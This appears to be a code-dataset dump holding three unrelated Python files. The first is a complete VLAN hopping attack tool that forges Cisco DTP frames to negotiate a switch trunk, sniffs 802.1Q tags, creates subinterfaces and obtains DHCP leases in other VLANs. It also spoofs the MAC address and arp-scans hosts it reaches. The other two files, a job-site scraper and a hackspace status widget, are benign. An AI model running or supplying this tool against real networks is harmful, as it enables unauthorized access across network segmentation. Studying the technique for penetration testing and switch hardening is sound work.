source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
VLANHopperDTP.py
|
#!/usr/bin/python
#
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available.
#
# This script works best in Unix/Linux environment as the script utilizes
# following applications:
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
# - dhclient
# - (optional) arp-scan
#
# However, it should also work under non-Unix/Linux platforms or platforms not
# offering aforementioned depenendcies. Under such circumstances the tool behaves
# as was described below.
#
# If the underlying system is not equipped with 8021q.ko and vconfig command,
# the script will be unable to create subinterfaces for discovered VLANs which
# also means no DHCP leases are going to be obtained. The VLAN Hopping attack
# may still be attempted, this will result in the switch passing inter-VLAN traffic
# to our interface to observe, but only passive sniffing will be left possible without
# ability to create subinterfaces to interact with other VLAN networks.
# If that limitation suits is acceptable, one can use --force option passed to this script
# in order to proceed when no vconfig was found.
#
# Python requirements:
# - scapy
#
# NOTICE:
# This program uses code written by 'floodlight', which comes from here:
# https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
#
# TODO:
# - Add logic that falls back to static IP address setup when DHCP fails
# - Possibly implement custom ARP/ICMP/DHCP spoofers or launch ettercap
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
# - Add functionality to auto-scan via arp-scan desired network
#
# Mariusz Banach / mgeeky, '18-19, <mb@binary-offensive.com>
#
import os
import re
import sys
import socket
import struct
import textwrap
import argparse
import tempfile
import commands
import threading
import subprocess
import fcntl, socket, struct
from ctypes import *
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.4.1'
config = {
'verbose' : False,
'debug' : False,
'force' : False,
'count' : 10,
'timeout' : 90,
'analyse' : False,
'interface' : '',
'macaddr' : '',
'inet' : '',
'origmacaddr' : '',
'commands' : [],
'exitcommands' : [],
}
arpScanAvailable = False
vconfigAvailable = False
stopThreads = False
attackEngaged = False
dot1qSnifferStarted = False
vlansDiscovered = set()
vlansHopped = set()
vlansLeases = {}
subinterfaces = set()
cdpsCollected = set()
tempfiles = []
#
# ===============================================
# Floodlight's afpacket definitions
#
ETH_P_8021Q = 0x8100
SOL_PACKET = 263
PACKET_AUXDATA = 8
TP_STATUS_VLAN_VALID = 1 << 4
class struct_iovec(Structure):
_fields_ = [
("iov_base", c_void_p),
("iov_len", c_size_t),
]
class struct_msghdr(Structure):
_fields_ = [
("msg_name", c_void_p),
("msg_namelen", c_uint32),
("msg_iov", POINTER(struct_iovec)),
("msg_iovlen", c_size_t),
("msg_control", c_void_p),
("msg_controllen", c_size_t),
("msg_flags", c_int),
]
class struct_cmsghdr(Structure):
_fields_ = [
("cmsg_len", c_size_t),
("cmsg_level", c_int),
("cmsg_type", c_int),
]
class struct_tpacket_auxdata(Structure):
_fields_ = [
("tp_status", c_uint),
("tp_len", c_uint),
("tp_snaplen", c_uint),
("tp_mac", c_ushort),
("tp_net", c_ushort),
("tp_vlan_tci", c_ushort),
("tp_padding", c_ushort),
]
libc = CDLL("libc.so.6")
recvmsg = libc.recvmsg
recvmsg.argtypes = [c_int, POINTER(struct_msghdr), c_int]
recvmsg.retype = c_int
def enable_auxdata(sk):
"""
Ask the kernel to return the VLAN tag in a control message
Must be called on the socket before afpacket.recv.
"""
sk.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1)
def recv(sk, bufsize):
"""
Receive a packet from an AF_PACKET socket
@sk Socket
@bufsize Maximum packet size
"""
buf = create_string_buffer(bufsize)
ctrl_bufsize = sizeof(struct_cmsghdr) + sizeof(struct_tpacket_auxdata) + sizeof(c_size_t)
ctrl_buf = create_string_buffer(ctrl_bufsize)
iov = struct_iovec()
iov.iov_base = cast(buf, c_void_p)
iov.iov_len = bufsize
msghdr = struct_msghdr()
msghdr.msg_name = None
msghdr.msg_namelen = 0
msghdr.msg_iov = pointer(iov)
msghdr.msg_iovlen = 1
msghdr.msg_control = cast(ctrl_buf, c_void_p)
msghdr.msg_controllen = ctrl_bufsize
msghdr.msg_flags = 0
rv = recvmsg(sk.fileno(), byref(msghdr), 0)
if rv < 0:
raise RuntimeError("recvmsg failed: rv=%d", rv)
# The kernel only delivers control messages we ask for. We
# only enabled PACKET_AUXDATA, so we can assume it's the
# only control message.
assert msghdr.msg_controllen >= sizeof(struct_cmsghdr)
cmsghdr = struct_cmsghdr.from_buffer(ctrl_buf) # pylint: disable=E1101
assert cmsghdr.cmsg_level == SOL_PACKET
assert cmsghdr.cmsg_type == PACKET_AUXDATA
auxdata = struct_tpacket_auxdata.from_buffer(ctrl_buf, sizeof(struct_cmsghdr)) # pylint: disable=E1101
if auxdata.tp_vlan_tci != 0 or auxdata.tp_status & TP_STATUS_VLAN_VALID:
# Insert VLAN tag
tag = struct.pack("!HH", ETH_P_8021Q, auxdata.tp_vlan_tci)
return buf.raw[:12] + tag + buf.raw[12:rv]
else:
return buf.raw[:rv]
#
# ===============================================
#
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stdout.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def inspectPacket(dtp):
tlvs = dtp['DTP'].tlvlist
stat = -1
for tlv in tlvs:
if tlv.type == 2:
stat = ord(tlv.status)
break
ret = True
if stat == -1:
Logger.fail('Something went wrong: Got invalid DTP packet.')
ret = False
elif stat == 2:
Logger.fail('DTP disabled, Switchport in Access mode configuration')
print('[!] VLAN Hopping is not possible.')
ret = False
elif stat == 3:
Logger.ok('DTP enabled, Switchport in default configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 4 or stat == 0x84:
Logger.ok('DTP enabled, Switchport in Dynamic Auto configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x83:
Logger.ok('DTP enabled, Switchport in Trunk/Desirable configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x81:
Logger.ok('DTP enabled, Switchport in Trunk configuration')
print('[+] VLAN Hopping IS possible.')
elif stat == 0xa5:
Logger.info('DTP enabled, Switchport in Trunk with 802.1Q encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
elif stat == 0x42:
Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
else:
Logger.info('Unknown DTP packet.')
Logger.dbg(dtp.show())
ret = False
if ret:
print('\n[>] After Hopping to other VLANs - leave this program running to maintain connections.')
return ret
def floodTrunkingRequests():
while not stopThreads:
# Ethernet
dot3 = Dot3(src = config['macaddr'], dst = '01:00:0c:cc:cc:cc', len = 42)
# Logical-Link Control
llc = LLC(dsap = 0xaa, ssap = 0xaa, ctrl = 3)
# OUT = Cisco, Code = DTP
snap = SNAP(OUI = 0x0c, code = 0x2004)
# DTP, Status = Access/Desirable (3), Type: Trunk (3)
dtp = DTP(ver = 1, tlvlist = [
DTPDomain(length = 13, type = 1, domain = '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'),
DTPStatus(status = '\\x03', length = 5, type = 2),
DTPType(length = 5, type = 3, dtptype = '\\xa5'),
DTPNeighbor(type = 4, neighbor = config['macaddr'], len = 10)
])
frame = dot3 / llc / snap / dtp
Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
send(frame, iface = config['interface'], verbose = False)
time.sleep(config['timeout'] / 3)
def engageDot1qSniffer():
global dot1qSnifferStarted
if dot1qSnifferStarted:
return
dot1qSnifferStarted = True
Logger.info('Started VLAN/802.1Q sniffer.')
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
sock.bind((config['interface'], ETH_P_ALL))
enable_auxdata(sock)
print('[>] Discovering new VLANs...')
while not stopThreads:
buf = recv(sock, 65535)
pkt = Ether(buf)
if pkt.haslayer(Dot1Q):
dot1q = pkt.vlan
if dot1q not in vlansDiscovered:
print('==> VLAN discovered: {}'.format(dot1q))
vlansDiscovered.add(dot1q)
if not config['analyse']:
t = threading.Thread(target = addVlanIface, args = (dot1q, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
Logger.info('Stopped VLAN/802.1Q sniffer.')
def processDtps(dtps):
global attackEngaged
if stopThreads: return
if attackEngaged == False:
success = False
for dtp in dtps:
if dtp.haslayer(DTP):
if inspectPacket(dtp):
success = True
break
if success:
Logger.ok('VLAN Hopping via Switch Spoofing may be possible.')
Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
if config['force']:
Logger.ok('FORCED VLAN Hopping via Switch Spoofing.')
Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
if attackEngaged:
engageDot1qSniffer()
def launchCommand(subif, cmd, forceOut = False, noCmd = False):
Logger.dbg('Subinterface: {}, Parsing command: "{}"'.format(subif, cmd))
if '%IFACE' in cmd: cmd = cmd.replace('%IFACE', subif)
if '%HWADDR' in cmd: cmd = cmd.replace('%HWADDR', getHwAddr(subif))
if '%IP' in cmd: cmd = cmd.replace('%IP', getIfaceIP(subif))
if '%NET' in cmd: cmd = cmd.replace('%NET', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"))
if '%MASK' in cmd: cmd = cmd.replace('%MASK', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $3}' | head -1"))
if '%GW' in cmd: cmd = cmd.replace('%GW', shell("route -n | grep " + subif + " | grep UG | awk '{print $2}' | head -1"))
if '%CIDR' in cmd: cmd = cmd.replace('%CIDR', '/' + shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2"))
cmd = cmd.strip()
if not noCmd:
print('[>] Launching command: "{}"'.format(cmd))
out = shell(cmd)
if forceOut:
print('\n' + '.' * 50)
print(out)
print('.' * 50 + '\n')
else:
Logger.info(out)
def launchCommands(subif, commands, forceOut = False, noCmd = False):
for cmd in commands:
launchCommand(subif, cmd, forceOut, noCmd)
def addVlanIface(vlan):
global subinterfaces
global vlansLeases
global tempfiles
subif = '{}.{}'.format(config['interface'], vlan)
if not vconfigAvailable:
Logger.fail('No 8021q or vconfig available. Unable to create {} subinterface and obtain DHCP lease.'.format(subif))
return
if subif in subinterfaces:
Logger.fail('Already created that subinterface: {}'.format(subif))
return
Logger.dbg('Creating new VLAN Subinterface for {}.'.format(vlan))
out = shell('vconfig add {} {}'.format(
config['interface'], vlan
))
if out.startswith('Added VLAN with VID == {}'.format(vlan)):
subinterfaces.add(subif)
pidFile = tempfile.NamedTemporaryFile().name
dbFile = tempfile.NamedTemporaryFile().name
tempfiles.append(pidFile)
tempfiles.append(dbFile)
Logger.dbg('So far so good, subinterface {} added.'.format(subif))
ret = False
for attempt in range(2):
Logger.dbg('Acquiring DHCP lease for {}'.format(subif))
shell('dhclient -lf {} -pf {} -r {}'.format(dbFile, pidFile, subif))
time.sleep(3)
if attempt > 0:
shell('dhclient -lf {} -pf {} -x {}'.format(dbFile, pidFile, subif))
time.sleep(3)
shell('dhclient -lf {} -pf {} {}'.format(dbFile, pidFile, subif))
time.sleep(3)
ip = getIfaceIP(subif)
if ip:
Logger.dbg('Subinterface obtained IP: {}'.format(ip))
ret = True
vlansHopped.add(vlan)
vlansLeases[vlan] = (
ip,
shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"),
shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2")
)
print('[+] Hopped to VLAN {}.: {}, subnet: {}/{}'.format(
vlan,
vlansLeases[vlan][0],
vlansLeases[vlan][1],
vlansLeases[vlan][2]
))
launchCommands(subif, config['commands'])
if arpScanAvailable:
Logger.info('ARP Scanning connected subnet.')
print('[>] Other hosts in hopped subnet: ')
launchCommand(subif, "arp-scan -x -g --vlan={} -I %IFACE %NET%CIDR".format(vlan), True, True)
break
else:
Logger.dbg('Subinterface {} did not receive DHCPOFFER.'.format(
subif
))
time.sleep(5)
if not ret:
Logger.fail('Could not acquire DHCP lease for: {}. Skipping.'.format(subif))
else:
Logger.fail('Failed.: "{}"'.format(out))
def addVlansFromCdp(vlans):
while not attackEngaged:
time.sleep(3)
if stopThreads:
return
for vlan in vlans:
Logger.info('Trying to hop to VLAN discovered in CDP packet: {}'.format(
vlan
))
t = threading.Thread(target = addVlanIface, args = (vlan, ))
t.daemon = True
t.start()
vlansDiscovered.add(vlan)
def processCdp(pkt):
global cdpsCollected
global vlansDiscovered
if not Dot3 in pkt or not pkt.dst == '01:00:0c:cc:cc:cc':
return
if not hasattr(pkt, 'msg'):
return
tlvs = {
1: 'Device Hostname',
2: 'Addresses',
3: 'Port ID',
4: 'Capabilities',
5: 'Software Version',
6: 'Software Platform',
9: 'VTP Management Domain',
10:'Native VLAN',
14:'VoIP VLAN',
22:'Management Address',
}
vlans = set()
out = ''
for tlv in pkt.msg:
if tlv.type in tlvs.keys():
fmt = ''
key = ' {}:'.format(tlvs[tlv.type])
key = key.ljust(25)
if hasattr(tlv, 'val'): fmt = tlv.val
elif hasattr(tlv, 'iface'): fmt = tlv.iface
elif hasattr(tlv, 'cap'):
caps = []
if tlv.cap & (2**0) != 0: caps.append("Router")
if tlv.cap & (2**1) != 0: caps.append("TransparentBridge")
if tlv.cap & (2**2) != 0: caps.append("SourceRouteBridge")
if tlv.cap & (2**3) != 0: caps.append("Switch")
if tlv.cap & (2**4) != 0: caps.append("Host")
if tlv.cap & (2**5) != 0: caps.append("IGMPCapable")
if tlv.cap & (2**6) != 0: caps.append("Repeater")
fmt = '+'.join(caps)
elif hasattr(tlv, 'vlan'):
fmt = str(tlv.vlan)
vlans.add(tlv.vlan)
elif hasattr(tlv, 'addr'):
for i in range(tlv.naddr):
addr = tlv.addr[i].addr
fmt += '{}, '.format(addr)
wrapper = textwrap.TextWrapper(
initial_indent = key,
width = 80,
subsequent_indent = ' ' * len(key)
)
out += '{}\n'.format(wrapper.fill(fmt))
Logger.dbg('Discovered new VLANs in CDP announcement: {} = {}'.format(tlvs[tlv.type], out.strip()))
out = re.sub(r'(?:\n)+', '\n', out)
if not out in cdpsCollected:
cdpsCollected.add(out)
print('\n[+] Discovered new CDP aware device:\n{}'.format(out))
if not config['analyse']:
t = threading.Thread(target = addVlansFromCdp, args = (vlans, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
def packetCallback(pkt):
Logger.dbg('RECV: ' + pkt.summary())
if Dot3 in pkt and pkt.dst == '01:00:0c:cc:cc:cc':
processCdp(pkt)
def sniffThread():
global vlansDiscovered
warnOnce = False
Logger.info('Sniffing for CDP/DTP frames (Max count: {}, Max timeout: {} seconds)...'.format(
config['count'], config['timeout']
))
while not stopThreads and not attackEngaged:
dtps = []
try:
dtps = sniff(
count = config['count'],
filter = 'ether[20:2] == 0x2004 or ether[20:2] == 0x2000',
timeout = config['timeout'],
prn = packetCallback,
stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
iface = config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
break
Logger.err('Exception occured during sniffing: ' + str(e))
if len(dtps) == 0 and not warnOnce:
Logger.fail('It seems like there was no DTP frames transmitted.')
Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):')
Logger.info('\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
Logger.info('\tSWITCH(config-if)# switchport mode access\n')
warnOnce = True
if len(dtps) > 0 or config['force']:
if len(dtps) > 0:
Logger.dbg('Got {} DTP frames.\n'.format(
len(dtps)
))
else:
Logger.info('Forced mode: Beginning attack blindly.')
t = threading.Thread(target = processDtps, args = (dtps, ))
t.daemon = True
t.start()
Logger.dbg('Stopped sniffing.')
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def changeMacAddress(iface, mac):
old = getHwAddr(iface)
print('[>] Changing MAC address of interface {}, from: {} to: {}'.format(
iface, old, mac
))
shell('ifconfig {} down'.format(iface))
shell('ifconfig {} hw ether {}'.format(iface, mac))
shell('ifconfig {} up'.format(iface))
ret = old != getHwAddr(iface)
if ret:
Logger.dbg('Changed.')
else:
Logger.dbg('Not changed.')
return ret
def assure8021qCapabilities():
global vconfigAvailable
if ('not found' in shell('modprobe -n 8021q')):
Logger.err('There is no kernel module named: "8021q".')
return False
if not shell('which vconfig'):
Logger.err('There is no "vconfig" utility. Package required: "vconfig".')
return False
shell('modprobe 8021q')
if not shell('lsmod | 8021q'):
Logger.err('Could not load kernel module named "8021q".')
return False
vconfigAvailable = True
return True
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.info('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def cleanup():
if config['origmacaddr'] != config['macaddr']:
Logger.dbg('Restoring original MAC address...')
changeMacAddress(config['interface'], config['origmacaddr'])
if vconfigAvailable:
for subif in subinterfaces:
Logger.dbg('Removing subinterface: {}'.format(subif))
launchCommands(subif, config['exitcommands'])
shell('vconfig rem {}'.format(subif))
Logger.dbg('Removing temporary files...')
for file in tempfiles:
os.remove(file)
def parseOptions(argv):
print('''
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz Banach / mgeeky '18-19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to new VLAN. One can use one of following placeholders in command: %%IFACE (choosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning - one have to append "&" at the end to make the script go along.')
parser.add_argument('-E', '--exit-execute', dest='exitcommand', metavar='CMD', default=[], action='append', help='Launch specified command at the end of this script (during cleanup phase).')
parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.')
#parser.add_argument('-O', '--outdir', metavar='DIR', dest='outdir', default='', help='If set, enables packet capture on interface connected to VLAN Hopped network and stores in specified output directory *.pcap files.')
parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation) or the operating system does not have support for 802.1Q through "8021q.ko" kernel module and "vconfig" command. In this case, the tool will only flood wire with spoofed DTP frames which will make possible to sniff inter-VLAN traffic but no interaction can be made.')
parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
args = parser.parse_args()
config['verbose'] = args.verbose
config['debug'] = args.debug
config['analyse'] = args.analyse
config['force'] = args.force
config['interface'] = args.interface
config['commands'] = args.command
config['exitcommands'] = args.exitcommand
if args.force:
config['timeout'] = 30
return args
def printStats():
print('\n' + '-' * 80)
print('\tSTATISTICS\n')
print('[VLANS HOPPED]')
if len(vlansHopped):
print('Successfully hopped (and got DHCP lease) to following VLANs ({}):'.format(
len(vlansHopped)
))
for vlan, net in vlansLeases.items():
print('- VLAN {}: {}, subnet: {}/{}'.format(vlan, net[0], net[1], net[2] ))
else:
print('Did not hop into any VLAN.')
print('\n[VLANS DISCOVERED]')
if len(vlansDiscovered):
print('Discovered following VLANs ({}):'.format(
len(vlansDiscovered)
))
for vlan in vlansDiscovered:
print('- VLAN {}'.format(vlan))
else:
print('No VLANs discovered.')
print('\n[CDP DEVICES]')
if len(cdpsCollected):
print('Discovered following CDP aware devices ({}):'.format(
len(cdpsCollected)
))
for dev in cdpsCollected:
print(dev + '\n')
else:
print('No CDP aware devices discovered.')
def main(argv):
global config
global stopThreads
global arpScanAvailable
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('dtp')
load_contrib('cdp')
if not assure8021qCapabilities():
if config['force']:
Logger.info('Proceeding anyway. The tool will be unable to obtain DHCP lease in hopped networks. Only passive sniffing will be possible.')
else:
Logger.err('Unable to proceed. Consider using --force option to overcome this limitation.')
Logger.err('In such case, the tool will only flood wire with spoofed DTP frames, which will make possible\n\tto sniff inter-VLAN traffic but no interaction can be made.\n\tThis is because the tool is unable to obtain DHCP lease for hopped networks.')
return False
if not opts.interface:
if not selectDefaultInterface():
Logger.err('Could not find suitable interface. Please specify it.')
return False
print('[>] Interface to work on: "{}"'.format(config['interface']))
config['origmacaddr'] = config['macaddr'] = getHwAddr(config['interface'])
if not config['macaddr']:
Logger.err('Could not acquire MAC address of interface: "{}"'.format(
config['interface']
))
return False
else:
Logger.dbg('Interface "{}" has MAC address: "{}"'.format(
config['interface'], config['macaddr']
))
config['inet'] = getIfaceIP(config['interface'])
if not config['inet']:
Logger.fail('Could not acquire interface\'s IP address! Proceeding...')
oldMac = config['macaddr']
if opts.mac:
oldMac = changeMacAddress(config['interface'], opts.mac)
if oldMac:
config['macaddr'] = opts.mac
else:
Logger.err('Could not change interface\'s MAC address!')
return False
if shell("which arp-scan") != '':
arpScanAvailable = True
else:
Logger.err('arp-scan not available: will not perform scanning after hopping.')
t = threading.Thread(target = sniffThread)
t.daemon = True
t.start()
try:
while True:
pass
except KeyboardInterrupt:
print('\n[>] Cleaning up...')
stopThreads = True
time.sleep(3)
cleanup()
printStats()
return True
if __name__ == '__main__':
main(sys.argv)
|
QCWY.py
|
from model import Qcwy
__author__ = 'Joynice'
from utils.utils import get_header, get_time
import requests
import queue
from lxml import etree
import threading
import os
import csv
class QCWY(object):
'''
前程无忧
:param
传入参数:关键字、城市、线程数
传出:csv文件
'''
def __init__(self, keyword, city='北京', thread=10, path=os.getcwd()):
self.keyword = keyword
self.city = city
self.thread = thread
self.csv_header = ['职位名称', '详细链接', '公司名称', '工作地点', '薪资', '发布时间', '职位信息', '公司信息']
self.baseurl = 'https://search.51job.com/list/'
self.header = get_header()
self.path = path
self.pagequeue = queue.Queue()
self.jobqueue = queue.Queue()
def _get_city_code(self):
url = 'https://js.51jobcdn.com/in/js/2016/layer/area_array_c.js'
req = requests.get(url, headers=self.header).text
a = req.find(self.city)
return req[a - 9:a - 3]
def _get_max_page(self):
city_code = self._get_city_code()
url = self.baseurl + '{},000000,0000,00,9,99,{},2,1.html'.format(city_code, self.keyword)
req = requests.get(url=url, headers=self.header)
req.encoding = 'gbk'
html = etree.HTML(req.text)
max_page = html.xpath('//*[@id="resultList"]/div[2]/div[5]/text()')[2][3:]
for page in range(1, int(max_page) + 1):
page_url = self.baseurl + '{},000000,0000,00,9,99,{},2,{}.html'.format(city_code, self.keyword, page)
self.pagequeue.put(page_url)
def Spider(self):
while not self.pagequeue.empty():
url = self.pagequeue.get()
print('正在爬取:{}'.format(url))
req = requests.get(url, headers=get_header())
req.encoding = 'gbk'
html = etree.HTML(req.text)
for i in range(4, 54):
try:
title = html.xpath('//*[@id="resultList"]/div[{}]/p/span/a/@title'.format(i))
if title[0] == None:
break
name = html.xpath('//*[@id="resultList"]/div[{}]/span[1]/a/text()'.format(i))
url = html.xpath('//*[@id="resultList"]/div[{}]/p/span/a/@href'.format(i))
print(url[0])
area = html.xpath('//*[@id="resultList"]/div[{}]/span[2]/text()'.format(i))
salery = html.xpath('//*[@id="resultList"]/div[{}]/span[3]/text()'.format(i))
time = html.xpath('//*[@id="resultList"]/div[{}]/span[4]/text()'.format(i))
req1 = requests.get(url[0], headers=get_header())
req1.encoding = 'gb2312'
html1 = etree.HTML(req1.text)
detail = ''.join(html1.xpath('//*[@class="bmsg job_msg inbox"]//*/text()'))
if detail.isspace():
detail = ''.join(html1.xpath('//*[@class="bmsg job_msg inbox"]/text()'))
print(detail)
gongsi = ''.join(html1.xpath('//*[@class="tmsg inbox"]/text()'))
if gongsi.isspace():
gongsi = ''.join(html1.xpath('//*[@class="tmsg inbox"]//*/text()'))
jobDetail = Qcwy()
jobDetail.title = title[0]
jobDetail.url = url[0]
jobDetail.company_name = name[0]
jobDetail.area = area[0]
jobDetail.salery = salery[0] if len(salery)!=0 else None
jobDetail.time = time[0]
jobDetail.detail = detail
jobDetail.company_info = gongsi
jobDetail.city = self.city
jobDetail.key_word = self.keyword
if len(salery) > 0:
salary = salery[0]
saleryArray = salary.split("-", 1)
if (len(saleryArray) >= 2):
saleryMin = saleryArray[0]
saleryMax = saleryArray[1]
jobDetail.salery_max = saleryMax
jobDetail.salery_min = saleryMin
# jobDetail.save()
data = {
"职位名称": title[0],
"详细链接": url[0],
"公司名称": name[0],
"工作地点": area[0],
"薪资": salery[0] if len(salery)!=0 else None,
"发布时间": time[0],
"职位信息": detail,
"公司信息": gongsi
}
self.jobqueue.put(data)
except:
continue
def run(self):
self._get_max_page()
thread_list = []
for i in range(self.thread):
t = threading.Thread(target=self.Spider)
thread_list.append(t)
for t in thread_list:
t.setDaemon(True)
t.start()
for t in thread_list:
t.join()
if os.path.exists(self.path):
data_list = []
self.path = os.path.join(self.path,'save-data')
while not self.jobqueue.empty():
data_list.append(self.jobqueue.get())
with open(os.path.join(self.path, '前途无忧招聘_关键词_{}_城市_{}.csv'.format(self.keyword, self.city)), 'w',
newline='', encoding='utf-8-sig') as f:
f_csv = csv.DictWriter(f, self.csv_header)
f_csv.writeheader()
f_csv.writerows(data_list)
if __name__ == '__main__':
a = QCWY(keyword='早教', city='南宁').run()
|
spaceapi.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=C0111,R0903
"""Displays the state of a Space API endpoint
Space API is an API for hackspaces based on JSON. See spaceapi.io for
an example.
Requires the following libraries:
* requests
Parameters:
* spaceapi.url: String representation of the api endpoint
* spaceapi.format: Format string for the output
Format Strings:
* Format strings are indicated by double %%
* They represent a leaf in the JSON tree, layers seperated by '.'
* Boolean values can be overwritten by appending '%true%false'
in the format string
* Example: to reference 'open' in '{'state':{'open': true}}'
you would write '%%state.open%%', if you also want
to say 'Open/Closed' depending on the boolean you
would write '%%state.open%Open%Closed%%'
contributed by `rad4day <https://github.com/rad4day>`_ - many thanks!
"""
import requests
import threading
import re
import json
import core.module
import core.widget
import core.input
import core.decorators
def formatStringBuilder(s, json):
"""
Parses Format Strings
Parameter:
s -> format string
json -> the spaceapi response object
"""
identifiers = re.findall(r"%%.*?%%", s)
for i in identifiers:
ic = i[2:-2] # Discard %%
j = ic.split("%")
# Only neither of, or both true AND false may be overwritten
if len(j) != 3 and len(j) != 1:
return "INVALID FORMAT STRING"
if len(j) == 1: # no overwrite
s = s.replace(i, json[j[0]])
elif json[j[0]]: # overwrite for True
s = s.replace(i, j[1])
else: # overwrite for False
s = s.replace(i, j[2])
return s
class Module(core.module.Module):
@core.decorators.every(minutes=15)
def __init__(self, config, theme):
super().__init__(config, theme, core.widget.Widget(self.getState))
core.input.register(self, button=core.input.LEFT_MOUSE, cmd=self.__forceReload)
self.__data = {}
self.__error = None
self.__thread = None
# The URL representing the api endpoint
self.__url = self.parameter("url", default="http://club.entropia.de/spaceapi")
self._format = self.parameter(
"format", default=" %%space%%: %%state.open%Open%Closed%%"
)
def state(self, widget):
try:
if self.__error is not None:
return ["critical"]
elif self.__data["state.open"]:
return ["warning"]
else:
return []
except KeyError:
return ["critical"]
def update(self):
if not self.__thread or self.__thread.is_alive() == False:
self.__thread = threading.Thread(target=self.get_api_async, args=())
self.__thread.start()
def getState(self, widget):
text = self._format
if self.__error is not None:
text = self.__error
else:
try:
text = formatStringBuilder(self._format, self.__data)
except KeyError:
text = "KeyError"
return text
def get_api_async(self):
try:
with requests.get(self.__url, timeout=10) as request:
# Can't implement error handling for python2.7 if I use
# request.json() as it uses simplejson in newer versions
self.__data = self.__flatten(json.loads(request.text))
self.__error = None
except requests.exceptions.Timeout:
self.__error = "Timeout"
except requests.exceptions.HTTPError:
self.__error = "HTTP Error"
except ValueError:
self.__error = "Not a JSON response"
core.event.trigger("update", [self.id], redraw_only=True)
# left_mouse_button handler
def __forceReload(self, event):
if self.__thread:
self.__thread.raise_exception()
self.__error = "RELOADING"
core.event.trigger("update", [self.id], redraw_only=True)
# Flattens the JSON structure recursively, e.g. ['space']['open']
# becomes ['space.open']
def __flatten(self, json):
out = {}
for key in json:
value = json[key]
if type(value) is dict:
flattened_key = self.__flatten(value)
for fk in flattened_key:
out[key + "." + fk] = flattened_key[fk]
else:
out[key] = value
return out
# Author: Tobias Manske <tobias@chaoswg.xyz>
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
